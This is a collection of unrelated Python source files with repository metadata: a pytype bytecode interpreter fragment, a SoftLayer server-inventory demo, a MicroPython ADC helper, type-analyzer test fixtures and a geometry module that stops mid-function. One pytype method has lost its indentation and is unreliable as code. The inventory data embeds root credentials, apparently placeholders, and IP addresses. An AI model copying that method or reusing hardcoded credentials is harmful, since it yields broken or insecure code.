    state, item = state.pop()
    self.print_item(item)
    return state
  def byte_PRINT_ITEM_TO(self, state):
    """Pop a stream and an item; record 'print >>stream, item' (py2)."""
    state, to = state.pop()
    state, item = state.pop()
    self.print_item(item, to)
    return state
  def byte_PRINT_NEWLINE(self, state):
    """Record a trailing newline for the py2 print statement."""
    self.print_newline()
    return state
  def byte_PRINT_NEWLINE_TO(self, state):
    """Pop a stream and record a newline printed to it (py2)."""
    state, to = state.pop()
    self.print_newline(to)
    return state
  def byte_JUMP_IF_TRUE_OR_POP(self, state, op):
    """Record both outcomes: jump (TOS kept) and fall-through (TOS popped)."""
    self.store_jump(op.target, state.forward_cfg_node())
    return state.pop_and_discard()
  def byte_JUMP_IF_FALSE_OR_POP(self, state, op):
    """Record both outcomes: jump (TOS kept) and fall-through (TOS popped)."""
    self.store_jump(op.target, state.forward_cfg_node())
    return state.pop_and_discard()
  def byte_JUMP_IF_TRUE(self, state, op):  # Not in py2.7
    """Record both the jump and the fall-through path; TOS is untouched."""
    self.store_jump(op.target, state.forward_cfg_node())
    return state
  def byte_JUMP_IF_FALSE(self, state, op):  # Not in py2.7
    """Record both the jump and the fall-through path; TOS is untouched."""
    self.store_jump(op.target, state.forward_cfg_node())
    return state
  def byte_POP_JUMP_IF_TRUE(self, state, op):
    """Pop the condition, then record both jump and fall-through paths."""
    state, unused_val = state.pop()
    self.store_jump(op.target, state.forward_cfg_node())
    return state
  def byte_POP_JUMP_IF_FALSE(self, state, op):
    """Pop the condition, then record both jump and fall-through paths."""
    state, unused_val = state.pop()
    self.store_jump(op.target, state.forward_cfg_node())
    return state
  def byte_JUMP_FORWARD(self, state, op):
    """Unconditional relative jump: merge current state into the target."""
    self.store_jump(op.target, state.forward_cfg_node())
    return state
  def byte_JUMP_ABSOLUTE(self, state, op):
    """Unconditional absolute jump: merge current state into the target."""
    self.store_jump(op.target, state.forward_cfg_node())
    return state
  def byte_SETUP_LOOP(self, state, op):
    """Push a 'loop' block whose handler is the instruction after the loop."""
    return self.push_block(state, "loop", op.target)
  def byte_GET_ITER(self, state):
    """Replace TOS with iter(TOS) by calling its __iter__ method."""
    state, seq = state.pop()
    state, it = self.load_attr(state, seq, "__iter__")
    state = state.push(it)
    # __iter__ is now on top of the stack; call it with zero arguments.
    return self.call_function_from_stack(state, 0, [])
  def store_jump(self, target, state):
    """Merge the given state into the saved state for a jump target."""
    self.frame.states[target] = state.merge_into(self.frame.states.get(target))
  def byte_FOR_ITER(self, state, op):
    """Advance the iterator on TOS; loop exit jumps to op.target."""
    # Loop-exhausted path: the iterator is popped before jumping past the loop.
    self.store_jump(op.target, state.pop_and_discard())
    state, f = self.load_attr(state, state.top(), "next")
    state = state.push(f)
    try:
      return self.call_function_from_stack(state, 0, [])
    except StopIteration:
      return state
  def byte_BREAK_LOOP(self, state):
    """Mark the state as leaving the loop; block unwinding uses the 'why'."""
    return state.set_why("break")
  def byte_CONTINUE_LOOP(self, state, op):
    """Handle 'continue' inside a try/finally by smuggling the jump target."""
    # This is a trick with the return value.
    # While unrolling blocks, continue and return both have to preserve
    # state as the finally blocks are executed. For continue, it's
    # where to jump to, for return, it's the value to return. It gets
    # pushed on the stack for both, so continue puts the jump destination
    # into return_value.
    # TODO(kramm): This probably doesn't work.
    self.return_value = op.target
    return state.set_why("continue")
  def byte_SETUP_EXCEPT(self, state, op):
    """Push a 'setup-except' block and pre-seed the handler's entry state."""
    # Assume that it's possible to throw the exception at the first
    # instruction of the code:
    self.store_jump(op.target, self.push_abstract_exception(state))
    return self.push_block(state, "setup-except", op.target)
  def byte_SETUP_FINALLY(self, state, op):
    """Push a 'finally' block and link the try body to the finally code."""
    # Emulate finally by connecting the try to the finally block (with
    # empty reason/why/continuation):
    self.store_jump(op.target, state.push(None))
    return self.push_block(state, "finally", op.target)
  def byte_POP_BLOCK(self, state):
    """Discard the innermost block from the block stack."""
    state, _ = state.pop_block()
    return state
  def byte_RAISE_VARARGS_PY2(self, state, op):
    """Raise an exception (Python 2 version)."""
    # NOTE: the dis docs are completely wrong about the order of the
    # operands on the stack!
    argc = op.arg
    exctype = val = tb = None
    if argc == 0:
      # Bare 'raise': re-raise the current exception, if any.
      if state.exception is None:
        raise exceptions.ByteCodeTypeError(
            "exceptions must be old-style classes "
            "or derived from BaseException, not NoneType")
      exctype, val, tb = state.exception
    elif argc == 1:
      state, exctype = state.pop()
    elif argc == 2:
      state, val = state.pop()
      state, exctype = state.pop()
    elif argc == 3:
      state, tb = state.pop()
      state, val = state.pop()
      state, exctype = state.pop()
    # There are a number of forms of "raise", normalize them somewhat.
    if isinstance(exctype, BaseException):
      # 'raise instance' form: derive the type from the instance.
      val = exctype
      exctype = type(val)
    state = state.set_exception(exctype, val, tb)
    if tb:
      return state.set_why("reraise")
    else:
      return state.set_why("exception")
  def byte_RAISE_VARARGS_PY3(self, state, op):
    """Raise an exception (Python 3 version)."""
    argc = op.arg
    cause = exc = None
    if argc == 2:
      # 'raise exc from cause'
      state, cause = state.pop()
      state, exc = state.pop()
    elif argc == 1:
      state, exc = state.pop()
    return self.do_raise(state, exc, cause)
  def byte_RAISE_VARARGS(self, state, op):
    """Dispatch to the py2 or py3 RAISE_VARARGS implementation."""
    if self.python_version[0] == 2:
      return self.byte_RAISE_VARARGS_PY2(state, op)
    else:
      return self.byte_RAISE_VARARGS_PY3(state, op)
  def byte_POP_EXCEPT(self, state):  # Python 3 only
    """Pop an except-handler block and unwind its stack entries."""
    state, block = state.pop_block()
    if block.type != "except-handler":
      raise VirtualMachineError("popped block is not an except handler")
    return self.unwind_block(block, state)
  def byte_SETUP_WITH(self, state, op):
    """Starts a 'with' statement. Will push a block."""
    state, ctxmgr = state.pop()
    # __exit__ is stashed under the block for WITH_CLEANUP to find later.
    state, exit_method = self.load_attr(state, ctxmgr, "__exit__")
    state = state.push(exit_method)
    state, enter = self.load_attr(state, ctxmgr, "__enter__")
    state, ctxmgr_obj = self.call_function_with_state(state, enter, [])
    if self.python_version[0] == 2:
      state = self.push_block(state, "with", op.target)
    else:
      assert self.python_version[0] == 3
      # py3 compiles 'with' using a finally block.
      state = self.push_block(state, "finally", op.target)
    return state.push(ctxmgr_obj)
def byte_WITH_CLEANUP(self, state):
"""Called at the end of a with block. Calls the exit handlers etc."""
# The code here does some weird stack manipulation: the exit function
# is buried in the stack, and where depends on what's on top of it.
# Pull out the exit function, and leave the rest in place.
u = state.top()
if isinstance(u, str):
if u in ("return", "continue"):
state, exit_func = state.pop_nth(2)
else:
state, exit_func = state.pop_nth(1)
v = self.make_none(state.node)
w = self.make_none(state.node)
u = self.make_none(state.node)
elif isinstance(u, type) and issubclass(u, BaseException):
if self.python_version[0] == 2:
state, (w, v, u) = state.popn(3)
state, exit_func = state.pop()
state = state.push(w, v, u)
else:
assert self.python_version[0] == 3
state, (w, v, u) = state.popn(3)
state, (tp, exc, tb) = state.popn(3)
state, (exit_func) = state.pop()
state = state.push(tp, exc, tb)
state = state.push(self.make_none(state.node))
state = state.push(w, v, u)
state, block = state.pop_block()
assert block.type == "except-handler"
state = state.push_block(block.type, block.handler, block.level - 1)
else:
# This is the case when None just got pushed to the top of the stack,
# to signal that we're at the end of the with block and no exception
# occured.
state = state.pop_and_discard() # pop None
state, exit_func = state.pop()
state = state.push(self.make_none(state.node))
v = self.make_none(state.node)
w = self.make_none(state.node)
state, suppress_exception = self.call_function_with_state(
state, exit_func, [u, v, w])
log.info("u is None: %r", self.is_none(u))
err = (not self.is_none(u)) and bool(suppress_exception)
if err:
# An error occurred, and was suppressed
if self.python_version[0] == 2:
state, _ = state.popn(3)
state.push(self.make_none(state.node))
else:
assert self.python_version[0] == 3
state = state.push("silenced")
return state
  def byte_MAKE_FUNCTION(self, state, op):
    """Create a function and push it onto the stack."""
    argc = op.arg
    if self.python_version[0] == 2:
      name = None
    else:
      assert self.python_version[0] == 3
      # NOTE(review): here the popped name variable is passed to
      # make_function as-is, while byte_MAKE_CLOSURE extracts the atomic
      # constant first -- confirm both are intended.
      state, name = state.pop()
    state, code = state.pop()
    state, defaults = state.popn(argc)
    globs = self.get_globals_dict()
    fn = self.make_function(name, code, globs, defaults)
    return state.push(fn)
  def byte_MAKE_CLOSURE(self, state, op):
    """Make a function that binds local variables."""
    argc = op.arg
    if self.python_version[0] == 2:
      # The py3 docs don't mention this change.
      name = None
    else:
      assert self.python_version[0] == 3
      state, name_var = state.pop()
      name = _get_atomic_python_constant(name_var)
    state, (closure, code) = state.popn(2)
    state, defaults = state.popn(argc)
    globs = self.get_globals_dict()
    fn = self.make_function(name, code, globs, defaults, closure)
    return state.push(fn)
  def byte_CALL_FUNCTION(self, state, op):
    """Call a function with positional/keyword args encoded in op.arg."""
    return self.call_function_from_stack(state, op.arg, [])
  def byte_CALL_FUNCTION_VAR(self, state, op):
    """Call a function with a *args sequence popped from the stack."""
    state, args = self.pop_varargs(state)
    return self.call_function_from_stack(state, op.arg, args)
  def byte_CALL_FUNCTION_KW(self, state, op):
    """Call a function with a **kwargs mapping popped from the stack."""
    state, kwargs = self.pop_kwargs(state)
    return self.call_function_from_stack(state, op.arg, [], kwargs)
  def byte_CALL_FUNCTION_VAR_KW(self, state, op):
    """Call a function with both *args and **kwargs from the stack."""
    state, kwargs = self.pop_kwargs(state)
    state, args = self.pop_varargs(state)
    return self.call_function_from_stack(state, op.arg, args, kwargs)
  def byte_YIELD_VALUE(self, state):
    """Pop the yielded value into return_value and suspend via why='yield'."""
    state, self.return_value = state.pop()
    return state.set_why("yield")
  def byte_IMPORT_NAME(self, state, op):
    """Import a single module."""
    full_name = self.frame.f_code.co_names[op.arg]
    # The identifiers in the (unused) fromlist are repeated in IMPORT_FROM.
    state, (level, fromlist) = state.popn(2)
    # The IMPORT_NAME for an "import a.b.c" will push the module "a".
    # However, for "from a.b.c import Foo" it'll push the module "a.b.c". Those
    # two cases are distinguished by whether fromlist is None or not.
    if self.is_none(fromlist):
      name = full_name.split(".", 1)[0]  # "a.b.c" -> "a"
    else:
      name = full_name
    module = self.import_module(name, _get_atomic_python_constant(level))
    if module is None:
      # Unresolvable import: substitute an "unknown" so analysis continues.
      log.error("Couldn't find module %r", name)
      module = self._create_new_unknown_value("import")
    return state.push(module.to_variable(state.node, name))
  def byte_IMPORT_FROM(self, state, op):
    """IMPORT_FROM is mostly like LOAD_ATTR but doesn't pop the container."""
    name = self.frame.f_code.co_names[op.arg]
    module = state.top()  # the module stays on the stack
    state, attr = self.load_attr(state, module, name, allow_descriptors=False)
    return state.push(attr)
  def byte_EXEC_STMT(self, state):
    """Pop the operands of a py2 'exec' statement; the exec itself is ignored."""
    state, (unused_stmt, unused_globs, unused_locs) = state.popn(3)
    log.warning("Encountered 'exec' statement. 'exec' is unsupported.")
    return state
  def byte_BUILD_CLASS(self, state):
    """Pop (name, bases, methods) and push a new class (py2)."""
    state, (name, bases, methods) = state.popn(3)
    return state.push(self.make_class(state.node, name, bases, methods))
  def byte_LOAD_BUILD_CLASS(self, state):
    # New in py3
    # NOTE(review): this pushes the host interpreter's __build_class__
    # directly (and __builtins__ may be a module or a dict depending on
    # context) -- confirm this is intentional rather than an abstract value.
    return state.push(__builtins__.__build_class__)
  def byte_STORE_LOCALS(self, state):
    """Pop a locals dict and install it as the frame's f_locals."""
    state, locals_dict = state.pop()
    self.frame.f_locals = _get_atomic_value(locals_dict)
    return state
  def byte_END_FINALLY(self, state):
    """Terminate a finally block; discard a pending exception if present."""
    state, exc = state.pop()
    if self.is_none(exc):
      return state
    else:
      log.info("Popping exception %r", exc)
      # Discard the remaining two entries of the (type, value, tb) triple.
      state = state.pop_and_discard()
      state = state.pop_and_discard()
    return state
  def byte_RETURN_VALUE(self, state):
    """Merge TOS into the frame's return variable and stop with why='return'."""
    state, var = state.pop()
    self.frame.return_variable.PasteVariable(var, state.node)
    return state.set_why("return")
  def byte_IMPORT_STAR(self, state):
    """Pops a module and stores all its contents in locals()."""
    # TODO(kramm): this doesn't use __all__ properly.
    state, mod_var = state.pop()
    mod = _get_atomic_value(mod_var)
    if isinstance(mod, abstract.Unknown):
      log.error("Doing 'from module import *' from unresolved module")
      return state
    log.info("%r", mod)
    # TODO(kramm): Add Module type to abstract.py
    for name, var in mod.items():
      # Names starting with "_" are not exported by "import *".
      if name[0] != "_":
        state = self.store_local(state, name, var)
    return state
  def byte_SLICE_0(self, state):
    # obj[:]
    return self.get_slice(state, 0)
  def byte_SLICE_1(self, state):
    # obj[i:]
    return self.get_slice(state, 1)
  def byte_SLICE_2(self, state):
    # obj[:j]
    return self.get_slice(state, 2)
  def byte_SLICE_3(self, state):
    # obj[i:j]
    return self.get_slice(state, 3)
  def byte_STORE_SLICE_0(self, state):
    # obj[:] = val
    return self.store_slice(state, 0)
  def byte_STORE_SLICE_1(self, state):
    # obj[i:] = val
    return self.store_slice(state, 1)
  def byte_STORE_SLICE_2(self, state):
    # obj[:j] = val
    return self.store_slice(state, 2)
  def byte_STORE_SLICE_3(self, state):
    # obj[i:j] = val
    return self.store_slice(state, 3)
  def byte_DELETE_SLICE_0(self, state):
    # del obj[:]
    return self.delete_slice(state, 0)
  def byte_DELETE_SLICE_1(self, state):
    # del obj[i:]
    return self.delete_slice(state, 1)
  def byte_DELETE_SLICE_2(self, state):
    # del obj[:j]
    return self.delete_slice(state, 2)
  def byte_DELETE_SLICE_3(self, state):
    # del obj[i:j]
    return self.delete_slice(state, 3)
| {
"repo_name": "pombredanne/pytype",
"path": "pytype/vm.py",
"copies": "1",
"size": "76296",
"license": "apache-2.0",
"hash": 1407455150932517600,
"line_mean": 35.8757854036,
"line_max": 80,
"alpha_frac": 0.6433626927,
"autogenerated": false,
"ratio": 3.55775238983446,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9661184180375905,
"avg_score": 0.007986180431711088,
"num_lines": 2069
} |
a = [{'accountId': 36364,
'bareMetalInstanceFlag': 0,
'datacenter': {'id': 3, 'longName': 'Dallas', 'name': 'dal01'},
'domain': 'playdom.com',
'fullyQualifiedDomainName': 'alert-mta-02.playdom.com',
'hardwareStatusId': 5,
'hostname': 'alert-mta-02',
'id': 102434,
'manufacturerSerialNumber': 'C81500A17L11083',
'networkComponents': [{'hardwareId': 102434,
'id': 598043,
'ipmiIpAddress': '10.37.12.16',
'ipmiMacAddress': '02:25:90:35:dd:32',
'maxSpeed': 1000,
'modifyDate': '2011-08-15T22:43:41-08:00',
'name': 'mgmt',
'networkVlanId': '',
'port': 0,
'speed': 1000,
'status': 'ACTIVE'},
{'hardwareId': 102434,
'id': 598044,
'macAddress': '00:25:90:35:dd:32',
'maxSpeed': 1000,
'modifyDate': '2011-08-15T22:43:38-08:00',
'name': 'eth',
'networkVlanId': '',
'port': 0,
'primaryIpAddress': '10.37.12.15',
'speed': 1000,
'status': 'ACTIVE'},
{'hardwareId': 102434,
'id': 598045,
'macAddress': '00:25:90:35:dd:33',
'maxSpeed': 1000,
'modifyDate': '2011-08-15T22:43:30-08:00',
'name': 'eth',
'networkVlanId': '',
'port': 1,
'primaryIpAddress': '75.126.118.17',
'speed': 1000,
'status': 'ACTIVE'}],
'networkManagementIpAddress': '10.37.12.16',
'notes': '[Ops:App:2011-11-15]',
'operatingSystem': {'hardwareId': 102434,
'id': 841656,
'manufacturerLicenseInstance': '',
'passwords': [{'createDate': '2012-02-14T15:32:42-08:00',
'id': 943133,
'modifyDate': '2012-02-14T15:32:42-08:00',
'password': 'blahblah',
'port': '',
'softwareId': 841656,
'username': 'root'},
{'createDate': '2012-02-14T15:32:42-08:00',
'id': 943134,
'modifyDate': '2012-02-14T15:32:42-08:00',
'password': 'blahasdf!',
'port': '',
'softwareId': 841656,
'username': 'softlayer'}],
'softwareLicense': {'id': 777,
'softwareDescription': {'controlPanel': 0,
'id': 775,
'manufacturer': 'Ubuntu',
'name': 'Ubuntu',
'operatingSystem': 1,
'requiredUser': 'root',
'upgradeSoftwareDescriptionId': '',
'upgradeSwDescId': '',
'version': '10.04.1-64',
'virtualLicense': 0,
'virtualizationPlatform': 0},
'softwareDescriptionId': 775}},
'primaryBackendIpAddress': '10.37.12.15',
'primaryIpAddress': '75.126.118.17',
'privateIpAddress': '10.37.12.15',
'processorCount': 2,
'serialNumber': 'SL0039617',
'serviceProviderId': 1,
'serviceProviderResourceId': 102434}]
# Report the private IP, hostname and datacenter of each device record
# (Python 2 script; missing fields default to empty strings).
for eachDev in a:
    ip=""
    hostname=""
    loc=""
    if ("privateIpAddress" in eachDev.keys()):
        ip=eachDev["privateIpAddress"]
    if ("hostname" in eachDev.keys()):
        hostname=eachDev["hostname"]
    if ("datacenter" in eachDev.keys()):
        # NOTE(review): this assigns the whole datacenter dict, not its
        # name -- confirm the print below is meant to show the full dict.
        loc=eachDev["datacenter"]
print "IP: %s, HOSTNAME: %s, LOCATION: %s" % (ip,hostname,loc) | {
"repo_name": "thomasvincent/utilities",
"path": "Standalone_Scripts/softlayer_iphostloc_puller/unused_source/demodict.py",
"copies": "1",
"size": "4606",
"license": "apache-2.0",
"hash": 3572778885764497000,
"line_mean": 48.5376344086,
"line_max": 104,
"alpha_frac": 0.3651758576,
"autogenerated": false,
"ratio": 4.70961145194274,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.557478730954274,
"avg_score": null,
"num_lines": null
} |
# Copyright (c) 2020 Peter Hinch
# Released under the MIT License (MIT) - see LICENSE file
import uasyncio as asyncio
import io
# MicroPython stream-protocol ioctl constants (const() is the MicroPython
# compile-time constant helper; presumably available as a builtin here).
MP_STREAM_POLL_RD = const(1)  # poll-for-read flag
MP_STREAM_POLL = const(3)  # ioctl request: poll
MP_STREAM_ERROR = const(-1)  # ioctl error return value
class AADC(io.IOBase):
    """Asynchronous ADC wrapper: awaiting an instance pauses until the ADC
    reading enters (or, with sense(False), leaves) a configured window."""
    def __init__(self, adc):
        self._adc = adc  # underlying ADC providing read_u16()
        self._lower = 0  # inclusive lower trigger bound
        self._upper = 65535  # inclusive upper trigger bound
        self._pol = True  # True: trigger when inside the window
        self._last = None  # last raw reading taken by _adcread()
        self._sreader = asyncio.StreamReader(self)
    def __iter__(self):
        # Makes the instance awaitable: reads the 2-byte sample produced by
        # read() once ioctl() signals readiness, and returns it as an int.
        b = yield from self._sreader.read(2)
        return int.from_bytes(b, 'little')
    def _adcread(self):
        # Take a fresh reading and remember it for read()/read_u16(last=True).
        self._last = self._adc.read_u16()
        return self._last
    def read(self, n):  # For use by StreamReader only
        # Note: n is ignored; always returns the last sample as 2 bytes.
        return int.to_bytes(self._last, 2, 'little')
    def ioctl(self, req, arg):
        # MicroPython stream poll hook: report "readable" when the reading's
        # relation to [lower, upper] matches the configured polarity.
        ret = MP_STREAM_ERROR
        if req == MP_STREAM_POLL:
            ret = 0
            if arg & MP_STREAM_POLL_RD:
                if self._pol ^ (self._lower <= self._adcread() <= self._upper):
                    ret |= MP_STREAM_POLL_RD
        return ret
    # *** API ***
    # If normal will pause until ADC value is in range
    # Otherwise will pause until value is out of range
    def sense(self, normal):
        self._pol = normal
    def read_u16(self, last=False):
        # last=True returns the cached sample without touching the hardware.
        if last:
            return self._last
        return self._adcread()
    # Call syntax: set limits for trigger
    # lower is None: leave limits unchanged.
    # upper is None: treat lower as relative to current value.
    # both have values: treat as absolute limits.
    def __call__(self, lower=None, upper=None):
        if lower is not None:
            if upper is None:  # Relative limit
                r = self._adcread() if self._last is None else self._last
                self._lower = r - lower
                self._upper = r + lower
            else:  # Absolute limits
                self._lower = lower
                self._upper = upper
        return self
| {
"repo_name": "peterhinch/micropython-async",
"path": "v3/primitives/aadc.py",
"copies": "1",
"size": "2011",
"license": "mit",
"hash": 1920003651234519000,
"line_mean": 29.0149253731,
"line_max": 79,
"alpha_frac": 0.5638985579,
"autogenerated": false,
"ratio": 3.808712121212121,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9869366032778571,
"avg_score": 0.0006489292667099286,
"num_lines": 67
} |
a = a # e 4
a = 1 # 0 int
l = [a] # 0 [int]
d = {a:l} # 0 {int:[int]}
s = "abc"
c = ord(s[2].lower()[0]) # 0 int # 4 (str) -> int
l2 = [range(i) for i in d] # 0 [[int]]
y = [(a,b) for a,b in {1:'2'}.iteritems()] # 0 [(int,str)]
b = 1 # 0 int
if 0:
b = '' # 4 str
else:
b = str(b) # 4 str # 12 int
r = 0 # 0 int
if r: # 3 int
r = str(r) # 4 str # 12 int
r # 0 <int|str>
l = range(5) # 0 [int]
l2 = l[2:3] # 0 [int]
x = l2[1] # 0 int
k = 1() # 0 <unknown> # e 4
del k
k # e 0
l = [] # 0 [int]
x = 1 # 0 int
while x: # 6 int
l = [] # 4 [int]
l.append(1) # 0 [int] # 2 (int) -> None
l = [1, 2] # 0 [int]
l2 = [x for x in l] # 0 [<int|str>]
l2.append('') # 0 [<int|str>]
s = str() # 0 str
s2 = str(s) # 0 str
s3 = repr() # e 5 # 0 str
s4 = repr(s) # 0 str
x = 1 if [] else '' # 0 <int|str>
l = [1] # 0 [<int|str>]
l2 = [''] # 0 [str]
l[:] = l2 # 0 [<int|str>]
b = 1 < 2 < 3 # 0 bool
l = sorted(range(5), key=lambda x:-x) # 0 [int]
d = {} # 0 {<bool|int>:<int|str>}
d1 = {1:''} # 0 {int:str}
d.update(d1)
d[True] = 1
d # 0 {<bool|int>:<int|str>}
l = [] # 0 [int]
l1 = [] # 0 [<unknown>]
l.extend(l1)
l.append(2)
l = [] # 0 [<[str]|int>]
l1 = [[]] # 0 [[str]]
l.extend(l1)
l[0].append('') # e 0
l.append(1)
l = [] # 0 [[<int|str>]]
l2 = [1] # 0 [int]
l3 = [''] # 0 [str]
l.append(l2)
l.append(l3)
for i, s in enumerate("aoeu"): # 4 int # 7 str
pass
x = 1 # 0 int
y = x + 1.0 # 0 float
y << 1 # e 0
l = [1, 1.0] # 0 [float]
1.0 in [1] # e 0
x = `1` # 0 str
def f():
x = `1` # 4 str
d = dict(a=1) # 0 {str:int}
l = list() # 0 [<unknown>]
i = int(1) # 0 int
i = int(1.2) # 0 int
i = abs(1) # 0 int
i = abs(1.0) # 0 float
d = dict() # 0 {int:int}
d[1] = 2
d2 = dict(d) # 0 {<int|str>:<int|str>}
d2[''] = ''
d3 = dict([(1,2)]) # 0 {int:int}
d4 = dict(a=1) # 0 {str:int}
| {
"repo_name": "kmod/icbd",
"path": "icbd/type_analyzer/tests/basic.py",
"copies": "1",
"size": "1818",
"license": "mit",
"hash": -7669605874459881000,
"line_mean": 16.1509433962,
"line_max": 58,
"alpha_frac": 0.4416941694,
"autogenerated": false,
"ratio": 1.9527389903329753,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.28944331597329753,
"avg_score": null,
"num_lines": null
} |
# aagen.geometry - module encapsulating interactions with the Shapely library.
import logging
import math
import re
import ast
from aagen.direction import Direction
from shapely.coords import CoordinateSequence
from shapely.geometry.point import Point
from shapely.geometry.linestring import LineString
from shapely.geometry.multilinestring import MultiLineString
from shapely.geometry.polygon import Polygon, LinearRing
from shapely.geometry.multipolygon import MultiPolygon
from shapely.geometry.collection import GeometryCollection
import shapely.affinity
from shapely.geometry import box
import shapely.ops
from shapely.validation import explain_validity
log = logging.getLogger(__name__)
def to_string(geometry):
    """Returns a brief (less precise) representation of a geometric object"""
    if geometry is None:
        return "<None>"
    elif hasattr(geometry, "is_empty") and geometry.is_empty:
        return "<{0} (empty)>".format(type(geometry).__name__)
    elif isinstance(geometry, Point):
        return "<Point ({0}, {1})>".format(numstr(geometry.x),
                                           numstr(geometry.y))
    elif isinstance(geometry, LineString):
        coords = geometry.coords
    elif isinstance(geometry, Polygon):
        coords = geometry.exterior.coords
    elif hasattr(geometry, "geoms"):
        # Multi-part geometry: recurse into each member.
        return "<{0} ({1})>".format(type(geometry).__name__,
                                    ", ".join([to_string(g) for
                                               g in geometry.geoms]))
    elif isinstance(geometry, CoordinateSequence):
        coords = list(geometry)
    elif type(geometry) is list or type(geometry) is tuple:
        # Bare coordinate list/tuple.
        coords = geometry
    else:
        raise RuntimeError("to_string: unknown object type {0}"
                           .format(geometry))
    # Fall-through cases: format the collected (x, y) coordinates.
    str_list = []
    for (x, y) in coords:
        str_list.append("({0}, {1})".format(numstr(x), numstr(y)))
    return "<{0}: [{1}]>".format(type(geometry).__name__,
                                 ", ".join(str_list))
def from_string(string):
    """Convert a string representation back to a list of coordinates"""
    # NOTE(review): only round-trips the "<Kind: [(x, y), ...]>" form of
    # to_string(); the "<Point (x, y)>", "<None>" and empty/multi forms have
    # no ":" separator and will fail the split below -- confirm callers only
    # pass coordinate-list representations.
    string = string.lstrip("<").rstrip(">")
    (kind, coords_str) = string.split(":")
    coords = ast.literal_eval(coords_str.strip())
    # Look up the constructor (LineString, Polygon, ...) by name.
    return globals()[kind](coords)
def bounds_str(geometry):
    """Returns a brief representation of the bounding box of an object"""
    # geometry.bounds is (minx, miny, maxx, maxy); each number is shortened
    # via numstr().
    return ("({0})".format(", ".join([numstr(x) for x in geometry.bounds])))
def numstr(value):
    """Render a number rounded to two decimals, without trailing zeros."""
    text = format(value, '.2f')
    return text.rstrip('0').rstrip('.')
def length(line):
    """Returns the Manhattan length of the given line segment.
    """
    p, q = list(line.boundary)
    dx = math.fabs(p.x - q.x)
    dy = math.fabs(p.y - q.y)
    return dx + dy
def grid_aligned(line, direction):
    """Returns whether the given line's endpoints are properly grid-constrained.

    A line is grid-aligned when it is straight, its normal is parallel to
    `direction`, and its endpoints lie on the 10-unit grid (cardinal lines)
    or the 5-unit half-grid (45-degree lines).
    """
    if (Direction.normal_to(line) != direction and
        Direction.normal_to(line) != direction.rotate(180)):
        return False
    # If the line bends, it is not grid aligned by definition:
    if len(line.simplify(0).coords) > 2:
        return False
    (p1, p2) = list(line.boundary)
    if p1.x == p2.x or p1.y == p2.y:
        # Vertical or horizontal, promising...
        return (math.fmod(p1.x, 10) == 0 and math.fmod(p2.x, 10) == 0 and
                math.fmod(p1.y, 10) == 0 and math.fmod(p2.y, 10) == 0)
    elif math.fabs(p1.x - p2.x) == math.fabs(p1.y - p2.y):
        # 45-degree angle, promising...
        return (math.fmod(p1.x, 5) == 0 and math.fmod(p2.x, 5) == 0 and
                math.fmod(p1.y, 5) == 0 and math.fmod(p2.y, 5) == 0)
    return False
# Geometric manipulation
def translate(shape, dx_or_dir, dy_or_dist):
    """Translate the given shape by the given (dx, dy) or by
    the given (direction, distance) and return the
    resulting new shape.
    """
    assert shape.is_valid
    if isinstance(dx_or_dir, Direction):
        # (direction, distance) form: scale the unit vector.
        dx = dx_or_dir.vector[0] * dy_or_dist
        dy = dx_or_dir.vector[1] * dy_or_dist
    else:
        dx = dx_or_dir
        dy = dy_or_dist
    new_shape = shapely.affinity.translate(shape, dx, dy)
    if not new_shape.is_valid and isinstance(new_shape, Polygon):
        log.warning("Polygon {0} no longer valid after translating ({1}, {2})??"
                    .format(to_string(shape), dx, dy))
        # buffer(0) is the standard Shapely trick to repair invalid polygons.
        new_shape = new_shape.buffer(0)
    assert new_shape.is_valid, (
        "Shape {0} was valid, but after translating by ({1}, {2}) the new "
        "shape {3} is not: {4}"
        .format(to_string(shape), dx, dy, to_string(new_shape),
                shapely.validation.explain_validity(new_shape)))
    return new_shape
def rotate(geometry, angle):
    """Rotate the given geometry, vector, or list of points by the given angle,
    which can be given in degrees, as a Direction, or as a vector (where east
    or (1,0) is an angle of 0 degrees).
    """
    if type(geometry) is tuple:
        # (x, y) - box and unbox it as a list of one point
        return rotate([geometry], angle)[0]
    if isinstance(angle, Direction):
        return rotate(geometry, angle.degrees)
    if type(angle) is tuple:
        # Vector form: convert to degrees relative to east.
        radians = math.atan2(angle[1], angle[0])
        degrees = math.degrees(radians)
    else:
        degrees = angle
        radians = math.radians(degrees)
    if type(geometry) is list or type(geometry) is tuple:
        # Point list: apply the 2D rotation matrix manually.
        output = []
        for (x0, y0) in geometry:
            (x1, y1) = (x0 * math.cos(radians) - y0 * math.sin(radians),
                        x0 * math.sin(radians) + y0 * math.cos(radians))
            log.debug("({0}, {1}) rotated by {2} degrees is ({3}, {4})"
                      .format(x0, y0, degrees, x1, y1))
            output.append((x1, y1))
        return output
    else:
        # Shapely geometry: delegate to the library (rotates about centroid
        # by default).
        return shapely.affinity.rotate(geometry, degrees)
# Geometric construction
def construct_intersection(base_line, base_dir, exit_dir_list, exit_width=None):
    """Construct the polygon describing an intersection between two or more
    passages.
    If exit_width is unspecified it is assumed to be the same as the base line.
    If exit_width is specified it will be used for all exits EXCEPT any exit
    in the same direction as the base_dir (i.e., passage continuation).
    Returns (polygon, {dir1: line1, dir2: line2, ...})
    """
    # Input validation
    assert isinstance(base_dir, Direction)
    for exit_dir in exit_dir_list:
        assert isinstance(exit_dir, Direction)
    base_line = line(base_line) # just to be safe
    # Make sure the direction we were given matches the base line's orientation
    test_dir = Direction.normal_to(base_line)
    assert (test_dir.angle_from(base_dir) == 0 or
            test_dir.angle_from(base_dir) == 180), \
        ("{0} must be same as or 180 degrees opposite {1}"
         .format(test_dir, base_dir))
    base_width = length(base_line)
    if exit_width is None:
        exit_width = base_width
    log.debug("base width: {0}, exit width: {1}".format(base_width, exit_width))
    # Categorize the exit directions by their relationship with the base dir
    exits_45 = []
    exits_90 = []
    exits_135 = []
    exit_fwd = None
    for exit_dir in exit_dir_list:
        if exit_dir.rotate(45) == base_dir or exit_dir.rotate(-45) == base_dir:
            exits_45.append(exit_dir)
        elif (exit_dir.rotate(90) == base_dir or
              exit_dir.rotate(-90) == base_dir):
            exits_90.append(exit_dir)
        elif (exit_dir.rotate(135) == base_dir or
              exit_dir.rotate(-135) == base_dir):
            exits_135.append(exit_dir)
        elif exit_dir == base_dir:
            exit_fwd = exit_dir
